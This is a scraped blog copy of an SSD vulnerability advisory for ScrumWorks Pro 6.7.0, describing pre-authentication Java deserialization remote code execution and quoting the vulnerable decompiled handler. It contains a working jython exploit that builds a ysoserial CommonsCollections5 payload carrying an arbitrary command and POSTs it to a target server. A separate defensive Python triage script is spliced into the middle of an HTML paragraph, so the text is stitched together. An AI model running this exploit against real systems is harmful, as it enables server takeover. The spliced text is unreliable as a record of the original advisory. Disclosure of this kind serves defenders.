{"id":8870,"date":"2017-08-22T14:19:22","date_gmt":"2017-08-22T22:19:22","guid":{"rendered":"http:\/\/www.palada.net\/index.php\/2017\/08\/22\/news-2643\/"},"modified":"2017-08-22T14:19:22","modified_gmt":"2017-08-22T22:19:22","slug":"news-2643","status":"publish","type":"post","link":"http:\/\/www.palada.net\/index.php\/2017\/08\/22\/news-2643\/","title":{"rendered":"SSD Advisory \u2013 ScrumWorks Pro Remote Code Execution"},"content":{"rendered":"<p><strong>Credit to Author: SSD \/ Maor Schwartz | Date: Tue, 22 Aug 2017 05:22:12 +0000<\/strong><\/p>\n<div class=\"entry-content\">\n<p><strong>Want to get paid for a vulnerability similar to this one?<\/strong><br \/>Contact us at: <a href=\"mailto:ssd@beyondsecurity.com\">ssd@beyondsecurity.com<\/a><\/p>\n<div class=\"pf-content\">\n<p><strong>Vulnerability Summary<\/strong><br \/> The following advisory describes a remote code execution vulnerability found in ScrumWorks Pro version 6.7.0. The application server deserializes untrusted Java objects sent by the Java client before performing any authentication or authorization check, so an unauthenticated attacker who can reach the server can execute arbitrary code with the permissions of the application server process.<\/p>\n<p>&#8220;CollabNet ScrumWorks Pro is an Agile Project Management for Developers, Scrum Masters, and Business&#8221;. A trial version can be downloaded from the vendor: https:\/\/www.collab.net\/products\/scrumworks<\/p>\n<p><strong>Credit<\/strong><br \/> A security researcher from Siberas has reported this vulnerability to Beyond Security\u2019s SecuriTeam Secure Disclosure program.<\/p>\n<p><strong>Vendor response<\/strong><br \/> CollabNet was informed of the vulnerability and responded: &#8220;We had a check with our Scrumworks Engineering team and after initial analysis, they&#8217;ve concluded that the Vulnerability which was reported will be considered of least priority from our end and it might be fixed in the future, however, We can&#8217;t assure you on the time line as our team is working with more priority issues at the moment.&#8221;<\/p>\n<p><span id=\"more-3387\"><\/span><\/p>\n<p><strong>Vulnerability details<\/strong><br \/> ScrumWorks Pro provides a web interface and a Java client that can be started via Java Web Start (JNLP).<\/p>\n<p>The Java client sends GZIP-compressed serialized Java objects to the \/UFC endpoint of the application server.
<\/p>\n<p>These requests are handled by the class <em>com.danube.scrumworks.controller.FrontController<\/em>, method <em>doPost<\/em>. The decompiled method follows; the comments mark the security-relevant lines:<\/p>\n<pre><code>protected void doPost(HttpServletRequest paramHttpServletRequest, HttpServletResponse paramHttpServletResponse)\n    throws IOException\n{\n    ServerSession localServerSession = getSession(paramHttpServletRequest);\n    AbstractExecutableCommand localAbstractExecutableCommand = null;\n    Object localObject1 = null;\n    \/\/ The request body is GZIP-decompressed and handed to a plain ObjectInputStream.\n    \/\/ No class filtering is applied and no authentication has been checked yet.\n    ObjectInputStream localObjectInputStream = new ObjectInputStream(new GZIPInputStream(paramHttpServletRequest.getInputStream()));\n    try\n    {\n        \/\/ readObject() instantiates whatever classes the client sent; a gadget chain\n        \/\/ executes here, before the cast to AbstractCommand is even evaluated.\n        AbstractCommand localAbstractCommand = (AbstractCommand)localObjectInputStream.readObject();\n        localAbstractExecutableCommand = (AbstractExecutableCommand)Class.forName(getExecutableCommandName(localAbstractCommand)).newInstance();\n        paramHttpServletResponse.addHeader(\"X-SWP-responseType\", \"object\");\n        \/\/ Session and authorization checks only start from this point on.\n        if (localServerSession.isExpired())\n        {\n            paramHttpServletRequest.getSession().invalidate();\n            sendResponse(paramHttpServletResponse, new ReAuthenticateException());\n            return;\n        }\n        localObject1 = ControllerUtils.extractUserFromAuthorizationHeader(paramHttpServletRequest);\n        String str = localObject1 == null ? null : ((UserTO)localObject1).getUserName();\n        LOGGER.info(\"[User: \" + str + \"] command: \" + localAbstractCommand);\n        if (Maintenance.isMaintenanceMode()) {\n            sendResponse(paramHttpServletResponse, ServerException.getMaintenanceModeException());\n        } else {\n            runCommandIfAuthorized((UserTO)localObject1, localAbstractExecutableCommand, localAbstractCommand, paramHttpServletResponse);\n        }\n    }\n    catch (ServerException localServerException)\n    {\n        localServerException.printStackTrace();\n        sendResponse(paramHttpServletResponse, localServerException);\n    }\n    catch (InvalidClassException localInvalidClassException)\n    {\n        LOGGER.error(\"An outdated client tried to send a command.  Please log out and restart the client.\");\n        sendResponse(paramHttpServletResponse, new ServerException(\"The server has been updated.  Please relaunch your client.\", localInvalidClassException));\n    }\n    catch (Exception localException)\n    {\n        LOGGER.debug(\"error handling request\", localException);\n        localObject1 = unwrapException(localException);\n        LOGGER.error(\"error executing a command\", (Throwable)localObject1);\n        if (localAbstractExecutableCommand != null) {\n            sendResponse(paramHttpServletResponse, ServerException.getMisconfiguredServerException((Exception)localObject1));\n        }\n    }\n    finally\n    {\n        localObjectInputStream.close();\n    }\n}<\/code><\/pre>\n<p>Before the first <em>try<\/em> block, the HTTP POST body is wrapped in a <em>GZIPInputStream<\/em> and then in a plain <em>ObjectInputStream<\/em>; the first statement inside the block reads a Java object from it via <em>readObject<\/em>. No class filtering is applied, so the application is vulnerable to Java deserialization attacks whenever a suitable gadget chain is available on its classpath. The session-expiry check and <em>runCommandIfAuthorized<\/em> only run after <em>readObject<\/em> has returned, by which time a gadget chain has already executed, so the attack needs no credentials.<\/p>\n<p>
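Added example, not code from the advisory or from CollabNet: a Python 3 triage script for a captured POST body to the /UFC endpoint. It makes the point above concrete for a defender. Because the client GZIP-wraps the body, the Java serialization magic AC ED 00 05 only appears after decompression, so a signature that inspects the raw body never fires; the script decompresses first, lists the class descriptors the stream would make the server instantiate, and compares them against an allowlist. The allowlist prefixes, the gadget class list and the sample command class name are assumptions and constructed inputs, not values taken from the advisory.

```python
"""Triage a captured POST body destined for the ScrumWorks /UFC endpoint.

Added example; not code from the SSD advisory or from CollabNet.  The
FrontController wraps the request body in GZIPInputStream before handing it
to ObjectInputStream, so the Java serialization magic (AC ED 00 05) is only
visible after decompression.  This script decompresses first, walks the stream
for TC_CLASSDESC records and flags classes outside an allowlist.
ALLOWED_PREFIXES is an assumption built from the com.danube.scrumworks package
name seen in the advisory; the command class in the benign sample is hypothetical.
"""
import gzip
import re
import struct

JAVA_SERIAL_MAGIC = b"\xac\xed\x00\x05"
TC_OBJECT = 0x73
TC_CLASSDESC = 0x72

# Assumed allowlist: the application's own command classes plus JDK basics the
# client legitimately sends.  A server-side fix would enforce the same list in
# ObjectInputStream.resolveClass or an ObjectInputFilter.
ALLOWED_PREFIXES = ("com.danube.scrumworks.", "java.lang.", "java.util.")

# Classes used by well-known ysoserial Commons Collections chains
# (CommonsCollections5 uses the first, second and fourth).
KNOWN_GADGET_CLASSES = frozenset([
    "javax.management.BadAttributeValueExpException",
    "org.apache.commons.collections.keyvalue.TiedMapEntry",
    "org.apache.commons.collections.functors.ChainedTransformer",
    "org.apache.commons.collections.functors.InvokerTransformer",
])

_CLASS_NAME_RE = re.compile(rb"\A[A-Za-z_$][\w$.]*\Z")


def decode_body(body: bytes) -> bytes:
    """Return the raw serialization stream: gunzip if the body carries the GZIP
    magic (1f 8b), otherwise pass it through unchanged."""
    if body[:2] == b"\x1f\x8b":
        return gzip.decompress(body)
    return body


def extract_class_names(stream: bytes) -> list:
    """Heuristic walk: a TC_CLASSDESC byte is followed by a 2-byte big-endian
    length and the class name in modified UTF-8.  A hit is accepted only if the
    bytes look like a Java class name; after a hit the scan skips past the name
    so letters inside it cannot be mistaken for new records."""
    names = []
    i = 0
    while True:
        i = stream.find(bytes([TC_CLASSDESC]), i)
        if i < 0 or i + 3 > len(stream):
            break
        (length,) = struct.unpack(">H", stream[i + 1:i + 3])
        candidate = stream[i + 3:i + 3 + length]
        if 0 < length <= 255 and len(candidate) == length and _CLASS_NAME_RE.match(candidate):
            names.append(candidate.decode("ascii"))
            i += 3 + length
        else:
            i += 1
    return names


def triage(body: bytes) -> dict:
    """Classify one request body: not-serialized, benign, suspicious or gadget-chain."""
    stream = decode_body(body)
    result = {"is_java_serialized": stream.startswith(JAVA_SERIAL_MAGIC),
              "classes": [], "disallowed": [], "known_gadgets": [], "verdict": "not-serialized"}
    if not result["is_java_serialized"]:
        return result
    result["classes"] = extract_class_names(stream)
    result["disallowed"] = [c for c in result["classes"] if not c.startswith(ALLOWED_PREFIXES)]
    result["known_gadgets"] = [c for c in result["classes"] if c in KNOWN_GADGET_CLASSES]
    if result["known_gadgets"]:
        result["verdict"] = "gadget-chain"
    elif result["disallowed"]:
        result["verdict"] = "suspicious"
    else:
        result["verdict"] = "benign"
    return result


def build_stream(class_names) -> bytes:
    """Constructed test input (not a capture): the stream header followed by one
    TC_OBJECT/TC_CLASSDESC record per class name with a zero serialVersionUID,
    SC_SERIALIZABLE flags, zero fields, TC_ENDBLOCKDATA and a TC_NULL superclass.
    Enough structure for the scanner, not a stream a JVM would fully accept."""
    out = bytearray(JAVA_SERIAL_MAGIC)
    for name in class_names:
        encoded = name.encode("ascii")
        out += bytes([TC_OBJECT, TC_CLASSDESC]) + struct.pack(">H", len(encoded)) + encoded
        out += b"\x00" * 8 + b"\x02" + b"\x00\x00" + b"\x78\x70"
    return bytes(out)


def gzip_body(stream: bytes) -> bytes:
    """Wrap a stream the way the ScrumWorks client does before POSTing it."""
    return gzip.compress(stream)


if __name__ == "__main__":
    benign = gzip_body(build_stream(["com.danube.scrumworks.example.ExampleCommand"]))  # hypothetical class
    attack = gzip_body(build_stream(["javax.management.BadAttributeValueExpException",
                                     "org.apache.commons.collections.functors.InvokerTransformer"]))
    for label, body in (("client request", benign), ("ysoserial-style body", attack)):
        print(label, "->", triage(body)["verdict"])
```

Running it prints a verdict for the two constructed bodies. The allowlist is the same one a server-side fix has to enforce inside the deserializer itself, by overriding ObjectInputStream.resolveClass (look-ahead deserialization) or, on Java 8u121 and later, with a JEP 290 ObjectInputFilter; checking at a proxy is only a compensating control, and removing or upgrading the gadget library (Commons Collections 3.2.2 or later) closes this particular chain but not others that may be on the classpath.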
As many other applications, ScrumWorks Pro ships with a vulnerable version of Apache <em>CommonsCollections<\/em> (3.2.1) that can be used to execute arbitrary code with the permissions of the ScrumWorks application server.<\/p>\n<p><strong>Proof of concept<\/strong><br \/> The following Python script requires jython (at least version 2.5.3) and a local copy of the ysoserial library (<a href=\"https:\/\/github.com\/frohoff\/ysoserial\" target=\"_blank\">https:\/\/github.com\/frohoff\/ysoserial<\/a>).<\/p>\n<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-599cade9cd2a7048494444\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div 
class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> &#8212;  #  # Scrumworks Java Deserialization Remote Code Execution PoC  #   import httplib  import urllib  import sys    import binascii    # load the ysoserial.jar file   sys.path.append(&#8220;.\/ysoserial.jar&#8221;)    from ysoserial import *  from ysoserial.payloads import *    # ZIP support  from java.io import ByteArrayOutputStream  from java.io import ObjectOutputStream  from java.util.zip import GZIPOutputStream      print &#8220;Scrumworks Java Deserialization Remote Code Execution PoC&#8221;  print &#8220;=========================================================&#8221;    if len(sys.argv) != 4:    print &#8220;usage: &#8221; + sys.argv[0] + &#8221; host port commandn&#8221;      exit(3)    payloadName = &#8220;CommonsCollections5&#8221;  payloadClass = ObjectPayload.Utils.getPayloadClass(payloadName);    if payloadClass is None:    print(&#8220;Can&#8217;t load ysoserial payload class&#8221;)    exit(2);    # serialize payload  payload = payloadClass.newInstance()  exploitObject = payload.getObject(sys.argv[3])    # create streams  byteStream = ByteArrayOutputStream()  zipStream = GZIPOutputStream(byteStream)  objectStream = ObjectOutputStream(zipStream)   objectStream.writeObject(exploitObject)    # close streams  objectStream.flush()  objectStream.close()  zipStream.close()  byteStream.close()    # http request  print &#8220;sending serialized command&#8221;  conn = httplib.HTTPConnection(sys.argv[1] + &#8220;:&#8221; + sys.argv[2])  conn.request(&#8220;POST&#8221;, &#8220;\/scrumworks\/UFC-poc-&#8220;, 
byteStream.toByteArray())  response = conn.getresponse()  conn.close()  print &#8220;done&#8221;  &#8212;<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums\" data-settings=\"show\">\n<div class=\"crayon-nums-content\" style=\"font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-num\" data-line=\"crayon-599cade9cd2a7048494444-1\">1<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-599cade9cd2a7048494444-2\">2<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-599cade9cd2a7048494444-3\">3<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-599cade9cd2a7048494444-4\">4<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-599cade9cd2a7048494444-5\">5<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-599cade9cd2a7048494444-6\">6<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-599cade9cd2a7048494444-7\">7<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-599cade9cd2a7048494444-8\">8<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-599cade9cd2a7048494444-9\">9<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-599cade9cd2a7048494444-10\">10<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-599cade9cd2a7048494444-11\">11<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-599cade9cd2a7048494444-12\">12<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-599cade9cd2a7048494444-13\">13<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-599cade9cd2a7048494444-14\">14<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-599cade9cd2a7048494444-15\">15<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-599cade9cd2a7048494444-16\">16<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-599cade9cd2a7048494444-17\">17<\/div>\n<div class=\"crayon-num crayon-striped-num\" 
data-line=\"crayon-599cade9cd2a7048494444-18\">18<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-599cade9cd2a7048494444-19\">19<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-599cade9cd2a7048494444-20\">20<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-599cade9cd2a7048494444-21\">21<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-599cade9cd2a7048494444-22\">22<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-599cade9cd2a7048494444-23\">23<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-599cade9cd2a7048494444-24\">24<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-599cade9cd2a7048494444-25\">25<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-599cade9cd2a7048494444-26\">26<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-599cade9cd2a7048494444-27\">27<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-599cade9cd2a7048494444-28\">28<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-599cade9cd2a7048494444-29\">29<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-599cade9cd2a7048494444-30\">30<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-599cade9cd2a7048494444-31\">31<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-599cade9cd2a7048494444-32\">32<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-599cade9cd2a7048494444-33\">33<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-599cade9cd2a7048494444-34\">34<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-599cade9cd2a7048494444-35\">35<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-599cade9cd2a7048494444-36\">36<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-599cade9cd2a7048494444-37\">37<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-599cade9cd2a7048494444-38\">38<\/div>\n<div class=\"crayon-num\" 
data-line=\"crayon-599cade9cd2a7048494444-39\">39<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-599cade9cd2a7048494444-40\">40<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-599cade9cd2a7048494444-41\">41<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-599cade9cd2a7048494444-42\">42<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-599cade9cd2a7048494444-43\">43<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-599cade9cd2a7048494444-44\">44<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-599cade9cd2a7048494444-45\">45<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-599cade9cd2a7048494444-46\">46<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-599cade9cd2a7048494444-47\">47<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-599cade9cd2a7048494444-48\">48<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-599cade9cd2a7048494444-49\">49<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-599cade9cd2a7048494444-50\">50<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-599cade9cd2a7048494444-51\">51<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-599cade9cd2a7048494444-52\">52<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-599cade9cd2a7048494444-53\">53<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-599cade9cd2a7048494444-54\">54<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-599cade9cd2a7048494444-55\">55<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-599cade9cd2a7048494444-56\">56<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-599cade9cd2a7048494444-57\">57<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-599cade9cd2a7048494444-58\">58<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-599cade9cd2a7048494444-59\">59<\/div>\n<div class=\"crayon-num crayon-striped-num\" 
data-line=\"crayon-599cade9cd2a7048494444-60\">60<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-599cade9cd2a7048494444-1\"><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8211;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-599cade9cd2a7048494444-2\"><span class=\"crayon-p\">#<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-599cade9cd2a7048494444-3\"><span class=\"crayon-p\"># Scrumworks Java Deserialization Remote Code Execution PoC<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-599cade9cd2a7048494444-4\"><span class=\"crayon-p\"># <\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-599cade9cd2a7048494444-5\"><span class=\"crayon-e\">import <\/span><span class=\"crayon-e\">httplib<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-599cade9cd2a7048494444-6\"><span class=\"crayon-e\">import <\/span><span class=\"crayon-e\">urllib<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-599cade9cd2a7048494444-7\"><span class=\"crayon-e\">import <\/span><span class=\"crayon-e\">sys<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-599cade9cd2a7048494444-8\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-599cade9cd2a7048494444-9\"><span class=\"crayon-e\">import <\/span><span class=\"crayon-v\">binascii<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-599cade9cd2a7048494444-10\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-599cade9cd2a7048494444-11\"><span class=\"crayon-p\"># load the ysoserial.jar file <\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-599cade9cd2a7048494444-12\"><span class=\"crayon-v\">sys<\/span><span class=\"crayon-sy\">.<\/span><span 
class=\"crayon-v\">path<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">append<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;.\/ysoserial.jar&#8221;<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-599cade9cd2a7048494444-13\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-599cade9cd2a7048494444-14\"><span class=\"crayon-e\">from <\/span><span class=\"crayon-e\">ysoserial <\/span><span class=\"crayon-e\">import *<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-599cade9cd2a7048494444-15\"><span class=\"crayon-e\">from <\/span><span class=\"crayon-v\">ysoserial<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">payloads <\/span><span class=\"crayon-e\">import *<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-599cade9cd2a7048494444-16\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-599cade9cd2a7048494444-17\"><span class=\"crayon-p\"># ZIP support<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-599cade9cd2a7048494444-18\"><span class=\"crayon-e\">from <\/span><span class=\"crayon-v\">java<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">io <\/span><span class=\"crayon-e\">import <\/span><span class=\"crayon-e\">ByteArrayOutputStream<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-599cade9cd2a7048494444-19\"><span class=\"crayon-e\">from <\/span><span class=\"crayon-v\">java<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">io <\/span><span class=\"crayon-e\">import <\/span><span class=\"crayon-e\">ObjectOutputStream<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-599cade9cd2a7048494444-20\"><span class=\"crayon-e\">from <\/span><span class=\"crayon-v\">java<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">util<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">zip 
<\/span><span class=\"crayon-e\">import <\/span><span class=\"crayon-e\">GZIPOutputStream<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-599cade9cd2a7048494444-21\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-599cade9cd2a7048494444-22\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-599cade9cd2a7048494444-23\"><span class=\"crayon-i\">print<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;Scrumworks Java Deserialization Remote Code Execution PoC&#8221;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-599cade9cd2a7048494444-24\"><span class=\"crayon-i\">print<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;=========================================================&#8221;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-599cade9cd2a7048494444-25\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-599cade9cd2a7048494444-26\"><span class=\"crayon-st\">if<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">len<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">sys<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">argv<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">!=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">4<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-599cade9cd2a7048494444-27\"><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-i\">print<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;usage: &#8220;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">sys<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">argv<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-cn\">0<\/span><span 
class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8221; host port commandn&#8221;<\/span><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-599cade9cd2a7048494444-28\"><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-e\">exit<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-cn\">3<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-599cade9cd2a7048494444-29\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-599cade9cd2a7048494444-30\"><span class=\"crayon-v\">payloadName<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;CommonsCollections5&#8221;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-599cade9cd2a7048494444-31\"><span class=\"crayon-v\">payloadClass<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">ObjectPayload<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">Utils<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">getPayloadClass<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">payloadName<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-599cade9cd2a7048494444-32\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-599cade9cd2a7048494444-33\"><span class=\"crayon-st\">if<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">payloadClass <\/span><span class=\"crayon-st\">is<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">None<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" 
id=\"crayon-599cade9cd2a7048494444-34\"><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-e\">print<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;Can&#8217;t load ysoserial payload class&#8221;<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-599cade9cd2a7048494444-35\"><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-e\">exit<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-cn\">2<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-599cade9cd2a7048494444-36\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-599cade9cd2a7048494444-37\"><span class=\"crayon-p\"># serialize payload<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-599cade9cd2a7048494444-38\"><span class=\"crayon-v\">payload<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">payloadClass<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">newInstance<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-599cade9cd2a7048494444-39\"><span class=\"crayon-v\">exploitObject<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">payload<\/span><span 